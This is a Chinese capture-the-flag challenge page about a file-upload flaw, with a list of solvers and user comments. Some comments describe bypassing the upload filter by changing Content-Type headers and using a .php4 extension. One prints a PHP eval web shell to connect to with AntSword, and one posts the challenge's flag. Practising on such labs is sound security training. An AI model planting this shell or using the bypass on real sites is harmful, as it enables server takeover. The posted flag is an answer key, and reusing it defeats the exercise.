评分(19)
解题动态
ylove 攻破了该题 15小时前
747137939 攻破了该题 1天前
momocanxue 攻破了该题 1天前
YS_JW 攻破了该题 1天前
liul6 攻破了该题 1天前
57 攻破了该题 2天前
wujita01 攻破了该题 2天前
zhuguangsen 攻破了该题 2天前
锅碗瓢盆 攻破了该题 2天前
nanaqilin 攻破了该题 2天前
names 攻破了该题 2天前
hsk_zy 攻破了该题 3天前
aaa1 攻破了该题 3天前
mmhhdm 攻破了该题 3天前
finsh 攻破了该题 3天前
TNF 攻破了该题 3天前
脚本gay 攻破了该题 5天前
犯困 攻破了该题 6天前
Cooper.juice 攻破了该题 7天前
评论
合肥徐总 1年前
举报
123.php.gif contenttype image/gif
Wchzzz 2年前
举报
怎么连上去打不开flag啊
1004025151 2年前
举报
flag{de5fd002182dd65121054872ac5570f0}
冯飞99 2年前
举报
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
zzccbb2005 2年前
举报
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
wjx2958958 2年前
举报
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了
ACHEN8899 2年前
举报
蚁剑连不上是什么原因啊?
XRain 2年前
举报
黑盒测出来也是有可能的,就是在请求头里面改改改,然后仔细观察返回的信息有什么差别。
XRain 2年前
举报
其实, php 后缀的检测机制跟其他后缀如 txt 的不一样,这点是能测出来的,因为 php、php1 和 1php 这些后缀都是返回 invalid file,像 txt、aaa 这种就返回 give me a image file not a php。所以,包含 php 的检测至少用了 strpos() 做判断。我也只测到这种程度,修改 Content-Type 真想不到。
GET-lee 2年前
举报
没任何提示